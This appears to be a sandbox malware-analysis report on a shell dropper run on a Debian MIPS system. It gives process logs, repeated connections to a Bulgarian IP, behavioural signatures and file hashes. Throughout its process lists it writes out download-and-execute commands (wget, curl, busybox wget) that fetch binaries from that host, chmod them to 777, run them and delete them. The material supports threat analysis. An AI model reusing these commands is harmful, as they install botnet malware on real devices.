[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/chmod

[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd

[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/rm

[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/wget

[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/chmod

[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg

[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/rm

[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/wget

[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/chmod

[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs

[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/rm

[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/wget

[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/chmod

[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ

[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/rm

[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/chmod

[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/rm

[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/chmod

[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB

[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/rm

[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/wget

[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/chmod

[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV

[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/rm

[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/wget

[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/chmod

[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL

[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/rm

[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/wget

[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/chmod

[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/rm

[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-20 03:36

Reported

2024-11-20 03:39

Platform

debian9-mipsel-20240611-en

Max time kernel

84s

Max time network

86s

Command Line

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk N/A
N/A /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 N/A
N/A /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy N/A
N/A /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 N/A
N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg N/A
N/A /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs N/A
N/A /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 N/A
N/A /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ N/A
N/A /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB N/A
N/A /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV N/A
N/A /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL N/A
N/A /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO N/A
N/A /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ N/A
N/A /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy N/A
N/A /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk N/A
N/A /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 N/A
N/A /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 N/A
N/A /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 N/A
N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg N/A
N/A /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs N/A
N/A /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ N/A
N/A /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ N/A
N/A /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB N/A
N/A /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV N/A
N/A /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL N/A
N/A /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /usr/bin/curl N/A
File opened for modification /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /usr/bin/curl N/A
File opened for modification /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /usr/bin/curl N/A
File opened for modification /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /usr/bin/curl N/A
File opened for modification /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /usr/bin/curl N/A
File opened for modification /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /usr/bin/curl N/A
File opened for modification /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /usr/bin/curl N/A
File opened for modification /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /usr/bin/curl N/A
File opened for modification /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /usr/bin/curl N/A
File opened for modification /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /usr/bin/curl N/A
File opened for modification /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /usr/bin/curl N/A
File opened for modification /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /usr/bin/curl N/A
File opened for modification /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /usr/bin/curl N/A
File opened for modification /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /usr/bin/curl N/A
File opened for modification /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /usr/bin/curl N/A
File opened for modification /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /usr/bin/curl N/A
File opened for modification /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /usr/bin/curl N/A
File opened for modification /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /usr/bin/curl N/A
File opened for modification /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /usr/bin/curl N/A
File opened for modification /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /usr/bin/curl N/A
File opened for modification /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /usr/bin/curl N/A
File opened for modification /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /usr/bin/curl N/A
File opened for modification /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /usr/bin/curl N/A
File opened for modification /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /usr/bin/curl N/A
File opened for modification /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /usr/bin/curl N/A
File opened for modification /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /usr/bin/curl N/A
File opened for modification /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /usr/bin/curl N/A
File opened for modification /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /usr/bin/curl N/A

Processes

/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/chmod

[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd

[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/rm

[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/wget

[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/chmod

[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg

[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/rm

[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/wget

[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/chmod

[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs

[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/rm

[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

